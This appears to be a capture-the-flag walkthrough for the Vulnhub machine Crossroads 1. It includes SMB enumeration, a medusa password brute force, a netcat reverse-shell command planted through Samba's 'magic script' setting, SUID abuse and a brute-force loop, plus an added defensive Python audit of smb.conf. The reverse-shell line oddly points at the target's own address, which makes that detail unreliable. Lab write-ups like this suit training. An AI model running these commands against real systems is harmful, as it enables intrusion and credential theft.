Crossroads 1 Vulnhub Walkthrough

nikit.penkar
Apr 10, 2021

This is a writeup for Vulnhub Machine Crossroads 1 which was released by tasiyanci.

Level: Beginner / Intermediate

Goal: Find user flag and root flag

Machine Discovery:

First we will use nmap -sn 192.168.0.0/24 to discover the machine in our network. (I have assigned my machine an IP in the 192.168.0.0/24 range.)

nmap -sn 192.168.0.0/24

Port Scanning:

Once the machine is discovered, we will do a port scan using nmap

nmap -A -T4 -p- 192.168.0.112

Exploiting User Flag:

We can see that Port 80 (HTTP), Port 139 and Port 445 (SMB) are open

We can try checking the website, but no luck there

Next we can try enumerating SMB using smbclient

Keep the password blank

smbclient -L \\\\192.168.0.112

We can see that there is a folder called smbshare

We will use enum4linux for more information about smb

enum4linux 192.168.0.112

We found a user albert

Now we need to crack the password for albert. I have used medusa for this

medusa -h 192.168.0.112 -u 'albert' -P /usr/share/wordlists/rockyou.txt -M smbnt

We found the password as bradley1

Now let's try to log in to SMB with username albert and password bradley1

Use ls to list the files present

smbclient //192.168.0.112/albert -U albert

And we got our User Flag!

Download the rest of the files using get

cd into the smbshare directory and download the smb.conf file

Exploiting Root Flag:

We have a file named beroot, an image named crossroads.png, the smb.conf file and the user flag

Let's open the smb.conf file and scroll to the end of the file

We can see magic script = smbscript.sh along with other details

cat smb.conf

We will create our own smbscript.sh and we will write our netcat reverse shell code in it

echo 'nc -e /bin/bash 192.168.0.112 4444' > smbscript.sh

Change its permission to 777 and log in to smb with user albert and the path of smbshare

smbclient //192.168.0.112/smbshare -U albert

Start a nc listener on your terminal and then upload the smbscript.sh file using put

And we got our reverse shell!

nc -nvlp 4444
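
The shell above comes from the share's magic script setting: Samba executes a file with that name, on behalf of the connected user, once it has been written to the share and closed. Below is an added example (not part of the original writeup) that audits an smb.conf for this setting; the sample config is constructed, and the /srv paths and the HIGH/MEDIUM labels are assumptions.

```python
import re

# Constructed sample; only "magic script = smbscript.sh" comes from the page.
SAMPLE_SMB_CONF = """\
[smbshare]
   path = /srv/smbshare
   read only = no
   magic script = smbscript.sh

[docs]
   path = /srv/docs
   read only = yes
"""
TRUE = {"yes", "true", "1", "on"}

def parse_smb_conf(text):
    """Return {section: {param: value}}; Samba ignores case/spaces in names."""
    sections, current = {}, None
    for line in map(str.strip, text.splitlines()):
        if not line or line[0] in "#;":
            continue
        header = re.fullmatch(r"\[(.+)\]", line)
        if header:
            current = sections.setdefault(header.group(1).strip().lower(), {})
        elif "=" in line and current is not None:
            key, value = line.split("=", 1)
            current[re.sub(r"\s+", "", key).lower()] = value.strip()
    return sections

def is_writable(p):
    """Simplified: 'read only' defaults to yes; 'writable' etc. invert it."""
    if "readonly" in p:
        return p["readonly"].lower() not in TRUE
    return any(p.get(k, "").lower() in TRUE for k in ("writable", "writeable", "writeok"))

def audit(text):
    """List (share, script, severity) for every share with a magic script."""
    sections = parse_smb_conf(text)
    defaults = sections.pop("global", {})  # [global] values apply to all shares
    findings = []
    for share, params in sections.items():
        eff = {**defaults, **params}
        if eff.get("magicscript"):
            sev = "HIGH" if is_writable(eff) else "MEDIUM"
            findings.append((share, eff["magicscript"], sev))
    return findings

if __name__ == "__main__":
    print(audit(SAMPLE_SMB_CONF))
```

On a real host, feed it the output of testparm -s so that included files are resolved. Removing the magic script line from the share closes this path.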

Change the terminal to bash using Python

python -c 'import pty;pty.spawn("/bin/bash")'

We will look for SUID binaries that user albert can run

find / -type f -perm -4000 -exec ls -l {} \; 2>/dev/null

We can see /beroot which we saw earlier in the smb

Let's open the beroot file using cat

cat beroot

We can see /bin/bash /root/beroot.sh which is the program to get root

./beroot

If we try to execute the program, we need the root password to log in

Let's go back to our Crossroads folder on our attack machine and examine crossroads.png

We can use stego tools to examine the .png file

I have used stegoveritas

stegoveritas crossroads.png

It will take time. Once completed it will create a folder called results

Let's cd into results and go to the keepers folder

We can see multiple files here. If we try to open the first file, we can see a wordlist

Let's save this file as wordlist.txt

Send the file to the victim using a Python HTTP server

We need to bruteforce the password. I have used the below script

for i in $(cat wordlist.txt); do echo $i | ./beroot; done

It will keep bruteforcing the password and once completed use ls

You will see a file called rootcreds

Open the file using cat

cat rootcreds

And you got your root password!

Let's log in as root with the password ___drifting___ using su

After logging in, go to the root folder and you will get the root flag!

cat root.txt

Thanks for reading! :)

Please let me know if you have any queries or suggestions.

Written by nikit.penkar

Security Researcher and Penetration Tester
